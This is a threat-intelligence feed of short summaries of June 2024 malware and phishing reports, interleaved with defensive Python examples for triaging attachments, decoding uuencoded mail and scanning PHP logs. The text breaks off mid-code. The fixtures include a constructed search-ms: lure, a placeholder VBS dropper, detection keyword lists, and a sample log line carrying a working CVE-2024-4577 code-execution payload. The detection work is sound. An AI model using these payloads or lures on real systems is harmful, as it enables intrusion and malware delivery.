Resecurity has detected new activity by the Smishing Triad threat group, which has now turned to targeting Pakistan. The group sends malicious iMessage and SMS messages impersonating Pakistan Post to customers of mobile carriers in order to steal personal and financial information. The code and templates used by the attackers are consistent with earlier Smishing Triad activity that targeted online banking, e-commerce, and payment system customers in other regions.
Source: https://www.resecurity.com/blog/article/smishing-triad-is-targeting-pakistan-to-defraud-banking-customers-at-scale
2024-06-14
DISGOMOJI_Malware_Used_to_Target_Indian_Government
MEDIUM
+
Intel Source:
Volexity
Intel Name:
DISGOMOJI_Malware_Used_to_Target_Indian_Government
Date of Scan:
2024-06-14
Impact:
MEDIUM
Summary:
Researchers at Volexity have discovered a cyber-espionage effort carried out by a possible threat actor based in Pakistan, which Volexity is presently monitoring under the alias UTA0137. Volexity lists the malware employed in these latest attacks as DISGOMOJI, which is built for Linux systems and written in Golang. Volexity is confident that UTA0137 has espionage-related goals and a mandate to target government entities in India.
Source: https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/
2024-06-13
KoiLoader_or_KoiStealer_Evades_Detection_with_Initial_Email_Query_Tactic
LOW
+
Intel Source:
PaloAlto
Intel Name:
KoiLoader_or_KoiStealer_Evades_Detection_with_Initial_Email_Query_Tactic
Date of Scan:
2024-06-13
Impact:
LOW
Summary:
Unit 42 timely threat intel researchers have observed threat actors distributing KoiLoader / KoiStealer while trying to evade detection with an initial email query: the message linking to the malware is sent only after the targeted organization responds to a first, benign email.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-12-IOCs-for-Koi-Loader-Stealer-infection.txt
2024-06-13
An_Overview_of_SmartApeSG
LOW
+
Intel Source:
Threatdown
Intel Name:
An_Overview_of_SmartApeSG
Date of Scan:
2024-06-13
Impact:
LOW
Summary:
Threatdown researchers have identified a new scam variant called SmartApeSG. SmartApeSG leverages compromised websites to load a fake browser update template that installs the NetSupport RAT. When users visit these compromised sites with Microsoft Edge, they see a message telling them to update their browser. Clicking the Update Edge button downloads a ZIP file containing a malicious JavaScript file; running it triggers a PowerShell command that downloads and executes the NetSupport RAT.
Source: https://www.threatdown.com/blog/smartapesg-06-11-2024/
2024-06-13
Operation_Celestial_Force_Targeting_Indian_Entities
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Operation_Celestial_Force_Targeting_Indian_Entities
Date of Scan:
2024-06-13
Impact:
LOW
Summary:
Researchers from Cisco Talos have revealed Operation Celestial Force, a new malware operation that has been active since at least 2018. It is still in use today, using a Windows-based malware loader known as HeavyLift in addition to the Android-based malware GravityRAT. A stand-alone program they are referring to as GravityAdmin is responsible for managing all GravityRAT and HeavyLift infections. It performs malicious operations on a compromised device. Analysis of the panel binaries reveals that they are intended to administer and execute numerous campaigns at the same time, each with its own admin panel and codename.
Source: https://blog.talosintelligence.com/cosmic-leopard/
2024-06-13
Kimsuky_Threat_Group_Exploiting_MS_Office_Vulnerability_to_Distribute_Keylogger
LOW
+
Intel Source:
ASEC
Intel Name:
Kimsuky_Threat_Group_Exploiting_MS_Office_Vulnerability_to_Distribute_Keylogger
Date of Scan:
2024-06-13
Impact:
LOW
Summary:
Researchers from ASEC have observed that Kimsuky threat group is exploiting a vulnerability (CVE-2017-11882) in the MS Office equation editor (EQNEDT32.EXE) to distribute a keylogger. The attackers use this vulnerability to execute a page with an embedded malicious script via the mshta process, thereby distributing the keylogger.
Source: https://asec.ahnlab.com/en/66720/
2024-06-13
Analysis_of_attack_cases_targeting_domestic_ERP_servers_installing_SoftEther_VPN
LOW
+
Intel Source:
ASEC
Intel Name:
Analysis_of_attack_cases_targeting_domestic_ERP_servers_installing_SoftEther_VPN
Date of Scan:
2024-06-13
Impact:
LOW
Summary:
Researchers from ASEC have recently analyzed an attack on a domestic company's ERP server. The attacker exploited vulnerabilities in the MS-SQL service to install a web shell for control and then set up a SoftEther VPN server, turning the compromised system into a VPN server that hides the attacker's origin and traffic. The tools used in this attack, such as FRP, HTran, and custom malware, are common in advanced threats and ransomware attacks.
Source: https://asec.ahnlab.com/ko/66581/
2024-06-12
Bondnet_Leveraging_Miner_Bots_as_C2
LOW
+
Intel Source:
ASEC
Intel Name:
Bondnet_Leveraging_Miner_Bots_as_C2
Date of Scan:
2024-06-12
Impact:
LOW
Summary:
Researchers from ASEC, while investigating systems infected with Bondnet miners, have confirmed that the Bondnet threat actor is still operational. They have also discovered that, since 2023, the actor has been setting up a reverse RDP environment on high-performance bots and using them as C2 servers. The reverse RDP environment was created only when a bot met specific hardware requirements.
Source: https://asec.ahnlab.com/en/66662/
2024-06-12
Misuse_of_Windows_Search_to_Lead_to_Malicious_Content
MEDIUM
+
Intel Source:
Trustwave
Intel Name:
Misuse_of_Windows_Search_to_Lead_to_Malicious_Content
Date of Scan:
2024-06-12
Impact:
MEDIUM
Summary:
Trustwave SpiderLabs researchers have discovered a malware campaign that abuses the Windows Search protocol handler (search-ms: URIs embedded in HTML) to deliver malware, combining social engineering with a little-used system feature. The campaign begins with a suspicious email that appears to be an invoice or other common document but actually carries an HTML attachment. To improve the deception and evade email security scanners, the threat actor wraps the HTML file inside a ZIP archive.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/
2024-06-12
Perspectives_on_Cyberthreats_Aimed_at_Brazilian_Users_and_Businesses
LOW
+
Intel Source:
Mandiant
Intel Name:
Perspectives_on_Cyberthreats_Aimed_at_Brazilian_Users_and_Businesses
Date of Scan:
2024-06-12
Impact:
LOW
Summary:
The analysis presents a detailed perspective of Brazil's complex cyber threat ecosystem, combining findings from Google's Threat Analysis Group and Mandiant intelligence. It focuses on the actions of state-sponsored cyber espionage groups targeting Brazil, particularly those from China, North Korea, and Russia. It also covers the domestic cybercrime ecosystem, with a focus on financially motivated threats and the distinct characteristics of Brazilian cybercriminals.
Source: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil/
2024-06-12
Privilege_Escalation_Vulnerability_May_Have_Used_by_Ransomware_Attackers_as_Zero_day
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Privilege_Escalation_Vulnerability_May_Have_Used_by_Ransomware_Attackers_as_Zero_day
Date of Scan:
2024-06-12
Impact:
MEDIUM
Summary:
Black Basta ransomware is operated by the Cardinal cybercrime group (also known as Storm-1811 and UNC4393), which may have exploited a recently patched Windows privilege escalation vulnerability as a zero-day. The vulnerability, CVE-2024-26169, lies in the Windows Error Reporting Service and, if exploited on affected systems, allows an attacker to gain elevated privileges. It was fixed on March 12, 2024, and Microsoft said at the time that there was no evidence of in-the-wild exploitation. However, examination of an exploit tool used in recent attacks suggests it was compiled before the patch, implying that at least one group may have exploited the vulnerability as a zero-day.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day
2024-06-12
New_BadSpace_Backdoor_Targeting_High_Ranking_Websites
LOW
+
Intel Source:
G DATA
Intel Name:
New_BadSpace_Backdoor_Targeting_High_Ranking_Websites
Date of Scan:
2024-06-12
Impact:
LOW
Summary:
Researchers from G DATA have discovered a new backdoor named BadSpace, deployed through a multi-stage attack involving infected websites, a C2 server, and sometimes a fake browser update. The initial infection begins with malicious code on high-ranking websites, particularly WordPress sites, which tracks visits with cookies. On a first visit, the site gathers user data and sends a GET request to a constructed URL; the response is a payload that can overwrite the webpage content. The malicious code is often injected into JavaScript libraries like jQuery or into the website's index page. The backdoor is deployed via JScript files, sometimes disguised with double extensions like ".pdf.js". Some infected sites present a fake Google Chrome update window which, once the download is run, installs the backdoor or the JScript dropper on the system.
Source: https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor
2024-06-12
Adwind_jRAT_campaigns_targeting_Italian_entities
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Adwind_jRAT_campaigns_targeting_Italian_entities
Date of Scan:
2024-06-12
Impact:
LOW
Summary:
Researchers at CERT-AGID have noted several malicious campaigns directed against Italy with the aim of spreading the Adwind/jRAT malware. The emails typically contain a ZIP archive holding HTML files named DOCUMENT.html or INVOICE.html; a double extension such as .pdf.html is also used in some cases. When the HTML file is opened, embedded JavaScript checks the browser's language setting: the malicious page content appears only if the browser language is Italian, otherwise a blank page is shown.
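The three lures above (HTML attachments abusing Windows Search URIs, JScript droppers named ".pdf.js", and ".pdf.html" pages gated on browser language) can be triaged with the same handful of checks. The following is an added example, not code from Trustwave, G DATA or CERT-AGID. The ZIP it builds is a constructed lure with a placeholder host (example.invalid), and the regexes are heuristics written for this illustration, not the vendors' detection logic.

```python
from __future__ import annotations

import html
import io
import re
import zipfile
from urllib.parse import parse_qs, unquote

# File names that hide a script/markup type behind a document-looking extension.
DOUBLE_EXTENSION = re.compile(
    r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(html?|js|jse|vbs|vbe|wsf|hta|lnk|exe|scr)$", re.I)
# Windows Search protocol handlers; a search-ms: URI can point Explorer at a remote share.
SEARCH_URI = re.compile(r"\bsearch(?:-ms)?:[^\"'\s<>]+", re.I)
# Client-side language gating, as in the Adwind/jRAT lures.
LANGUAGE_GATE = re.compile(r"navigator\.(?:language|languages|userLanguage|browserLanguage)", re.I)
TEXT_TYPES = (".html", ".htm", ".js", ".jse", ".hta", ".vbs", ".wsf")


def search_uri_location(uri: str) -> str | None:
    """Return the 'crumb=location:' target of a search-ms: URI, if it has one."""
    _, _, query = uri.partition(":")
    for crumb in parse_qs(unquote(query)).get("crumb", []):
        if crumb.lower().startswith("location:"):
            return crumb[len("location:"):]
    return None


def triage_archive(zip_bytes: bytes) -> list[dict]:
    """Inspect every member of a ZIP attachment and return per-file findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reasons = []
            if DOUBLE_EXTENSION.search(info.filename):
                reasons.append("double extension")
            if info.filename.lower().endswith(TEXT_TYPES):
                # unescape so &amp; inside attribute values does not split the URI
                text = html.unescape(zf.read(info).decode("utf-8", errors="replace"))
                for uri in SEARCH_URI.findall(text):
                    target = search_uri_location(uri) or "(no location crumb)"
                    reasons.append(f"Windows Search URI -> {target}")
                if LANGUAGE_GATE.search(text):
                    reasons.append("browser language gate")
            if reasons:
                findings.append({"file": info.filename, "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed lure, not a real sample: a double-extension HTML page that only
    acts for Italian-language browsers and redirects to a search-ms: URI whose
    location crumb points at a placeholder UNC share."""
    lure = r"""<html><body>
<script>
  if (navigator.language.toLowerCase().startsWith("it")) {
    location.href = "search-ms:query=Fattura&crumb=location:\\\\example.invalid\\share&displayname=Fatture";
  } else { document.body.innerHTML = ""; }
</script></body></html>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("FATTURA.pdf.html", lure)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_archive(build_sample_zip()):
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

The location crumb is the part worth extracting: it names the remote share Explorer will be pointed at, which is the indicator to block at the proxy or firewall and to search for in other mailboxes.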
Source: https://cert-agid.gov.it/news/campagne-adwind-jrat-attive-contro-obiettivi-italiani/
2024-06-12
PHP_Flaw_Exploited_by_TellYouThePass_Ransomware_Campaign
MEDIUM
+
Intel Source:
Imperva
Intel Name:
PHP_Flaw_Exploited_by_TellYouThePass_Ransomware_Campaign
Date of Scan:
2024-06-12
Impact:
MEDIUM
Summary:
Imperva Threat Research reports that attackers are exploiting the recently disclosed PHP vulnerability CVE-2024-4577. Since June 8th, they have observed attacker activity using this vulnerability to distribute malware, now identified as part of the "TellYouThePass" ransomware campaign. TellYouThePass has been active since 2019, targeting both businesses and individuals on Windows and Linux systems. It frequently exploits CVE-2021-44228 (Apache Log4j) and has also been observed exploiting CVE-2023-46604 (Apache ActiveMQ).
Source: https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/
2024-06-11
Gitloker_Attack_Leveraging_GitHub_Notifications_to_Push_Malicious_oAuth_Apps
LOW
+
Intel Source:
X (Twitter)
Intel Name:
Gitloker_Attack_Leveraging_GitHub_Notifications_to_Push_Malicious_oAuth_Apps
Date of Scan:
2024-06-11
Impact:
LOW
Summary:
In an ongoing extortion campaign that wipes compromised repositories, threat actors impersonate GitHub's security and recruitment staff in phishing attacks that hijack repositories via malicious OAuth apps. The phishing emails steer potential victims to fake GitHub talent community domains, as reported by CronUp security researcher Germán Fernández on X (Twitter).
Source: https://x.com/1ZRR4H/status/1798926893246447708
2024-06-11
WARMCOOKIE_Backdoor
MEDIUM
+
Intel Source:
Elastic
Intel Name:
WARMCOOKIE_Backdoor
Date of Scan:
2024-06-11
Impact:
MEDIUM
Summary:
Elastic Security Labs has identified a wave of phishing email campaigns deploying a new backdoor called WARMCOOKIE. These campaigns mainly use job and recruiting themes, with tailored emails that lure targets into clicking seemingly legitimate links leading to landing pages that mimic real job portals. After the victim solves a CAPTCHA, a malicious JavaScript file is downloaded. WARMCOOKIE communicates with hard-coded C2 addresses over an encrypted channel, and the attackers keep rotating their infrastructure to avoid detection. The backdoor persists by creating a scheduled task that runs every 10 minutes.
Source: https://www.elastic.co/security-labs/dipping-into-danger
2024-06-11
Malvertising_Campaign_Targeting_PuTTY_and_WinSCP_Users_to_Compromise_Windows_Administrators
LOW
+
Intel Source:
SOC Radar
Intel Name:
Malvertising_Campaign_Targeting_PuTTY_and_WinSCP_Users_to_Compromise_Windows_Administrators
Date of Scan:
2024-06-11
Impact:
LOW
Summary:
Researchers from SOCRadar have described a recent malvertising campaign that targets users of PuTTY and WinSCP and therefore poses a significant threat to Windows administrators. The attackers use deceptive ads to lure victims into downloading trojanized installers from fraudulent download sites.
Source: https://socradar.io/malvertising-campaign-targets-windows-administrators-using-putty-and-winscp/
2024-06-11
Latest_Variant_of_ValleyRAT_Targeting_Devices_with_New_Techniques
LOW
+
Intel Source:
Zscaler
Intel Name:
Latest_Variant_of_ValleyRAT_Targeting_Devices_with_New_Techniques
Date of Scan:
2024-06-11
Impact:
LOW
Summary:
Researchers at Zscaler have discovered a new campaign used to deliver ValleyRAT, a malware developed by a China-based threat actor. This latest ValleyRAT variant shows modifications compared to previously documented versions. These changes include updates in device fingerprinting, bot ID generation, and the range of commands supported by the RAT.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat
2024-06-11
Vietnamese_Entities_Targeted_by_China_Linked_Mustang_Panda_in_Cyber_Espionage
LOW
+
Intel Source:
Cyble
Intel Name:
Vietnamese_Entities_Targeted_by_China_Linked_Mustang_Panda_in_Cyber_Espionage
Date of Scan:
2024-06-11
Impact:
LOW
Summary:
CRIL researchers have identified a campaign by the China-based cyber espionage group Mustang Panda targeting Vietnamese entities with tax compliance themes. This campaign is linked to an earlier one aimed at the education sector. Both campaigns started with spam emails containing ZIP or RAR archives with malicious LNK files, which executed further malicious activity through PowerShell and batch files. The group uses advanced techniques such as abusing legitimate tools to evade detection, and its focus on individuals in the financial and educational sectors shows an intent to gain access to sensitive information.
Source: https://cyble.com/blog/vietnamese-entities-targeted-by-china-linked-mustang-panda-in-cyber-espionage
2024-06-11
SmallTiger_Malware_Attacks_on_South_Korean_Businesses
MEDIUM
+
Intel Source:
ASEC
Intel Name:
SmallTiger_Malware_Attacks_on_South_Korean_Businesses
Date of Scan:
2024-06-11
Impact:
MEDIUM
Summary:
AhnLab Security Intelligence Center (ASEC) has been addressing attacks on South Korean businesses using the SmallTiger malware, attributed to the Kimsuky group. The initial access method is unknown, but SmallTiger was deployed during lateral movement. The attacks initially involved DurianBeacon malware, later transitioning to SmallTiger as a downloader since February 2024. These attacks exploited software updater programs and targeted defense contractors, automobile part manufacturers, and semiconductor manufacturers.
Source: https://asec.ahnlab.com/en/66546/
2024-06-11
ASEC_Discovers_Remcos_RAT_Delivered_via_UUEncoded_Phishing_Emails
MEDIUM
+
Intel Source:
ASEC
Intel Name:
ASEC_Discovers_Remcos_RAT_Delivered_via_UUEncoded_Phishing_Emails
Date of Scan:
2024-06-11
Impact:
MEDIUM
Summary:
The AhnLab Security Intelligence Center (ASEC) has detected a new malware distribution campaign using UUEncoded (UUE) files to deliver Remcos RAT through phishing emails. These emails, disguised as import/export shipment or quotation details, contain encoded VBS scripts designed to bypass detection.
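An added example, not ASEC's code, for the UUE delivery described above: decode a uuencoded attachment body with the standard library, recover the declared file name and mode from the "begin" line, and flag script-like names and script markers in the payload. The email text and the embedded VBS are constructed placeholders, not the Remcos dropper.

```python
from __future__ import annotations

import binascii
import re

UU_BEGIN = re.compile(r"^begin\s+([0-7]{3,4})\s+(.+?)\s*$")
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1",
                     ".bat", ".cmd", ".exe", ".scr", ".lnk")
# Strings a shipping quotation has no business containing.
SCRIPT_MARKERS = (b"createobject(", b"wscript.shell", b"powershell",
                  b"shell.application", b"msxml2.xmlhttp")


def decode_uue(text: str) -> tuple[str, str, bytes]:
    """Decode the first uuencoded block in *text*.

    Returns (declared_filename, unix_mode, payload) and raises ValueError when
    there is no well-formed begin/end pair.
    """
    lines = text.splitlines()
    start = next((i for i, line in enumerate(lines) if UU_BEGIN.match(line)), None)
    if start is None:
        raise ValueError("no uuencode 'begin' line")
    mode, name = UU_BEGIN.match(lines[start]).groups()
    payload = bytearray()
    for line in lines[start + 1:]:
        if line.strip() == "end":
            return name, mode, bytes(payload)
        if line:  # a lone "`" decodes to zero bytes; an empty line would decode to 32 NULs
            payload += binascii.a2b_uu(line)
    raise ValueError("uuencode block has no 'end' line")


def triage_uue(text: str) -> dict:
    """Decode the attachment and explain why it looks like a script dropper."""
    name, mode, payload = decode_uue(text)
    lowered = payload.lower()
    reasons = []
    if name.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append(f"executable/script name: {name}")
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            reasons.append(f"script marker: {marker.decode()}")
    return {"filename": name, "mode": mode, "size": len(payload), "reasons": reasons}


def uuencode(name: str, data: bytes, mode: str = "644") -> str:
    """Produce a uuencoded block (used here only to build the constructed sample)."""
    out = [f"begin {mode} {name}"]
    for i in range(0, len(data), 45):  # uuencode carries 45 raw bytes per line
        out.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    out += ["`", "end"]
    return "\n".join(out) + "\n"


# Constructed lure body: a harmless placeholder script, not the real dropper.
SAMPLE_SCRIPT = b'Set sh = CreateObject("WScript.Shell")\r\nsh.Popup "constructed sample"\r\n'
SAMPLE_MAIL = (
    "Dear customer,\n\nPlease find attached the quotation for shipment REF-2024-0611.\n\n"
    + uuencode("Quotation_Details.vbs", SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    print(triage_uue(SAMPLE_MAIL))
```

Mail gateways that do not understand uuencode hand the body through as plain text, which is the whole point of the lure; decoding it yourself before applying file-type and content rules closes that gap.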
Source: https://asec.ahnlab.com/en/66463/
2024-06-11
Attackers_Exploiting_Cloud_Services_for_Malware_Distribution_and_Data_Theft
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Attackers_Exploiting_Cloud_Services_for_Malware_Distribution_and_Data_Theft
Date of Scan:
2024-06-11
Impact:
MEDIUM
Summary:
Researchers at AhnLab Security Intelligence Center have discovered that attackers are leveraging cloud services like Google Drive, OneDrive, and Dropbox to gather user information and disseminate malware. These attackers primarily upload malicious scripts, Remote Access Trojan (RAT) malware, and decoy documents to these cloud platforms to execute their attacks. The files uploaded by the attackers operate systematically, carrying out a range of malicious activities.
Source: https://asec.ahnlab.com/en/66429/
2024-06-11
Diving_Deep_into_SSLoad_Malware
LOW
+
Intel Source:
Intezer
Intel Name:
Diving_Deep_into_SSLoad_Malware
Date of Scan:
2024-06-11
Impact:
LOW
Summary:
Researchers at Intezer have provided an in-depth analysis of SSLoad, a stealthy malware targeting victims since April 2024. It highlights the diverse delivery methods, including phishing emails with decoy Word documents and fake Azure pages, leading to the installation of SSLoad payloads. The investigation looks into the malware's functionality and payload execution chain, with a focus on flexibility and potential usage in Malware-as-a-Service operations.
Source: https://intezer.com/blog/research/ssload-technical-malware-analysis/
2024-06-10
UNC5537_attacks_Snowflake_customer_instances
MEDIUM
+
Intel Source:
Mandiant (Google Cloud)
Intel Name:
UNC5537_attacks_Snowflake_customer_instances
Date of Scan:
2024-06-10
Impact:
MEDIUM
Summary:
Based on Google's recent investigations, the UNC5537 threat actor accessed multiple organizations' Snowflake customer instances using stolen customer credentials. These credentials were harvested by several infostealer malware campaigns that infected systems not owned by Snowflake. The threat actor logged in to the affected customer accounts and exported significant customer data from the Snowflake instances. Mandiant identified that most of the credentials used by UNC5537 were available from previous infostealer infections, some dating back to 2020.
Source: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion https://www.virustotal.com/gui/collection/0d487b996555e03ea2853d24c805a473822fafd7da683ab2123d0f1e688001b8
2024-06-10
Probing_for_new_PHP_vulnerability
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Probing_for_new_PHP_vulnerability
Date of Scan:
2024-06-10
Impact:
LOW
Summary:
An ISC SANS handler discusses newly observed probes for the PHP vulnerability CVE-2024-4577, which affects PHP running in CGI mode on Windows under certain locales. It allows OS command injection through user-supplied parameters passed to php.exe.
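For both CVE-2024-4577 entries (the Imperva TellYouThePass report above and this ISC SANS diary), what a defender most wants is a way to spot the probes in web server logs. The example below is added here and is not Imperva's or ISC's code. It relies on the documented mechanism of the bug: on Windows, in the affected locales, the best-fit Unicode mapping turns the soft hyphen (0xAD) into "-", so a percent-encoded %AD in a CGI query string is handed to php-cgi as a command-line switch. The log lines are constructed with documentation IP addresses, shaped like the public probe traffic.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes, urlsplit

# Combined-log-format request line: client, timestamp, method, target, protocol.
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+"')
SOFT_HYPHEN = b"\xad"


def injected_php_options(target: str) -> list[str]:
    """Return php-cgi switches smuggled into the query string of a request target.

    The query is split on '+' the way CGI builds argv, each token is percent-decoded
    to raw bytes, and a token starting with 0xAD is reported as the '-' option it
    becomes after best-fit mapping; the following token is attached as its value.
    """
    query = urlsplit(target).query
    if not query:
        return []
    tokens = unquote_to_bytes(query.replace("+", " ")).split()
    options, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith(SOFT_HYPHEN) and len(tok) >= 2:
            opt = "-" + tok[1:].decode("latin-1")
            if i + 1 < len(tokens) and not tokens[i + 1].startswith(SOFT_HYPHEN):
                opt += " " + tokens[i + 1].decode("latin-1")
                i += 1
            options.append(opt)
        i += 1
    return options


def scan_access_log(lines: list[str]) -> list[dict]:
    """One hit per request whose query string carries 0xAD-prefixed php-cgi options."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        options = injected_php_options(m["target"])
        if options:
            path = urlsplit(m["target"]).path.lower()
            hits.append({
                "ip": m["ip"], "time": m["ts"], "path": path, "options": options,
                # direct hits on the CGI binary or a .php script are the real exposure
                "php_cgi_target": path.endswith(("php-cgi.exe", "php.exe", ".php")),
            })
    return hits


# Constructed log lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2024:09:15:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.42 - - [10/Jun/2024:09:15:31 +0000] "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 87 "-" "python-requests/2.31"',
    '203.0.113.42 - - [10/Jun/2024:09:15:32 +0000] "GET /test.php?%ADs HTTP/1.1" 200 2210 "-" "python-requests/2.31"',
    "this line is not in combined log format",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["options"])
```

Matching on the decoded byte rather than on the literal string "%AD" also catches the lower-case "%ad" spelling and double-encoded variants, and reporting the option letters tells you at a glance whether the request was a bare "-s" source-disclosure probe or a "-d auto_prepend_file" code-execution attempt.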
Source: https://isc.sans.edu/diary/Attacker+Probing+for+New+PHP+Vulnerablity+CVE20244577/30994/
2024-06-10
IcedID_Brings_ScreenConnect_and_CSharp_Streamer_to_ALPHV_Ransomware_Deployment
MEDIUM
+
Intel Source:
The DFIR Report
Intel Name:
IcedID_Brings_ScreenConnect_and_CSharp_Streamer_to_ALPHV_Ransomware_Deployment
Date of Scan:
2024-06-10
Impact:
MEDIUM
Summary:
The DFIR report researchers have discovered a sophisticated cyber intrusion that began with a phishing email containing IcedID malware and progressed to the deployment of Cobalt Strike and CSharp Streamer for reconnaissance and lateral movement. Over eight days, the attacker gained access to critical servers, exfiltrated data via Rclone, and eventually installed ALPHV ransomware, deleting backups and leaving ransom notes.
Source: https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/
2024-06-10
Sapphire_Werewolf_attacks
LOW
+
Intel Source:
Bi.Zone
Intel Name:
Sapphire_Werewolf_attacks
Date of Scan:
2024-06-10
Impact:
LOW
Summary:
The Sapphire Werewolf group used the Amethyst stealer to attack over 300 companies, delivering malicious files and using the Windows Task Scheduler for persistence. The stealer collects sensitive data, sends it to a Telegram bot, and has evolved to use password-protected archives.
Source: https://bi.zone/eng/expertise/blog/sapphire-werewolf-ottachivaet-izvestnyy-stiler-dlya-novykh-atak/
2024-06-10
Unveiling_the_JScript_RAT_Attack_Chain
LOW
+
Intel Source:
G DATA
Intel Name:
Unveiling_the_JScript_RAT_Attack_Chain
Date of Scan:
2024-06-10
Impact:
LOW
Summary:
G DATA researchers have found that in recent years JScript-based RATs have frequently been deployed via phishing campaigns. When the initial loader script is executed, it connects to a command and control (C&C) server, which responds with a new malicious script. This second-stage loader is run on demand and in turn fetches the RAT component from the C&C server, which is once again written in JScript. The RAT component runs indefinitely unless told to stop and carries out additional commands from the C&C server.
Source: https://www.gdatasoftware.com/blog/2024/06/37955-jscript-rat-and-cobaltstrike
2024-06-10
The_Grandoreiro_Malware_Campaign
LOW
+
Intel Source:
SOC Radar
Intel Name:
The_Grandoreiro_Malware_Campaign
Date of Scan:
2024-06-10
Impact:
LOW
Summary:
Researchers at SOCRadar report that the Grandoreiro banking malware has resurfaced as a major global threat to banking security despite law enforcement efforts to shut it down. First seen in 2016, this Windows malware has targeted more than 1,500 banks in over 60 countries. It uses advanced methods to penetrate networks and evade detection, and because it is offered as Malware-as-a-Service (MaaS), a wide range of criminals can use it.
Source: https://socradar.io/grandoreiro-malware-campaign-a-global-threat-to-banking-security/
2024-06-10
New_Phishing_Campaign_Using_Stealthy_JPGs_to_Drop_Agent_Tesla
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
New_Phishing_Campaign_Using_Stealthy_JPGs_to_Drop_Agent_Tesla
Date of Scan:
2024-06-10
Impact:
MEDIUM
Summary:
Researchers from FortiGuard Labs have discovered a phishing campaign targeting Spanish-speaking individuals to spread a new Agent Tesla variant. The campaign uses several techniques against Windows systems to deliver the core module, including MS Office vulnerabilities, JavaScript code, PowerShell code, and fileless modules.
Source: https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people
2024-06-10
The_ClearFake_malware_updated_techiques
LOW
+
Intel Source:
Threatdown
Intel Name:
The_ClearFake_malware_updated_techiques
Date of Scan:
2024-06-10
Impact:
LOW
Summary:
The ClearFake malware campaign has returned with a new social-engineering technique that mimics browser updates on compromised websites. It tricks users into running malicious PowerShell code, leading to a Lumma Stealer infection.
Source: https://www.threatdown.com/blog/clearfake-walkthrough-06-03-2024/
2024-06-08
An_ongoing_cryptojacking_campaign_targeting_Kubernetes_clusters
LOW
+
Intel Source:
Wiz blog
Intel Name:
An_ongoing_cryptojacking_campaign_targeting_Kubernetes_clusters
Date of Scan:
2024-06-08
Impact:
LOW
Summary:
Wiz researchers observed an ongoing cryptojacking campaign targeting misconfigured Kubernetes clusters in customers' cloud environments. The threat actor took advantage of anonymous access to an Internet-facing cluster to start malicious container images hosted on Docker Hub. These images contain a UPX-packed DERO miner named "pause".
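An added example, not Wiz's code: offline checks over the JSON that `kubectl get clusterrolebindings -o json` and `kubectl get pods -A -o json` return, for the two conditions this campaign needed: a binding that grants a role to unauthenticated callers, and a pod running a Docker Hub image that masquerades as the `pause` infra container. The JSON below is constructed; `example-user/pause:latest` is a placeholder, not the campaign's image. Note that the real pause (sandbox) container is created by the kubelet and never appears in a Pod spec, so a container literally named "pause" in a spec is only normal for deliberate placeholder pods that use the official registry.k8s.io image.

```python
from __future__ import annotations

import json

ANONYMOUS_SUBJECTS = {"system:anonymous", "system:unauthenticated"}
POWERFUL_ROLES = {"cluster-admin", "admin", "edit"}
OFFICIAL_PAUSE_PREFIXES = ("registry.k8s.io/pause", "k8s.gcr.io/pause")


def image_registry(image: str) -> str:
    """Registry host of an image reference; Docker Hub ('docker.io') when none is given.

    Follows the reference grammar: the first path component is a registry only
    if it contains '.' or ':' or is 'localhost'.
    """
    first = image.split("/", 1)[0]
    if "/" in image and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"


def anonymous_bindings(bindings: dict) -> list[dict]:
    """Bindings that grant a role to unauthenticated callers, rated by the role's power."""
    hits = []
    for b in bindings.get("items", []):
        role = b["roleRef"]["name"]
        for s in b.get("subjects") or []:
            if s.get("name") in ANONYMOUS_SUBJECTS:
                hits.append({"binding": b["metadata"]["name"], "subject": s["name"], "role": role,
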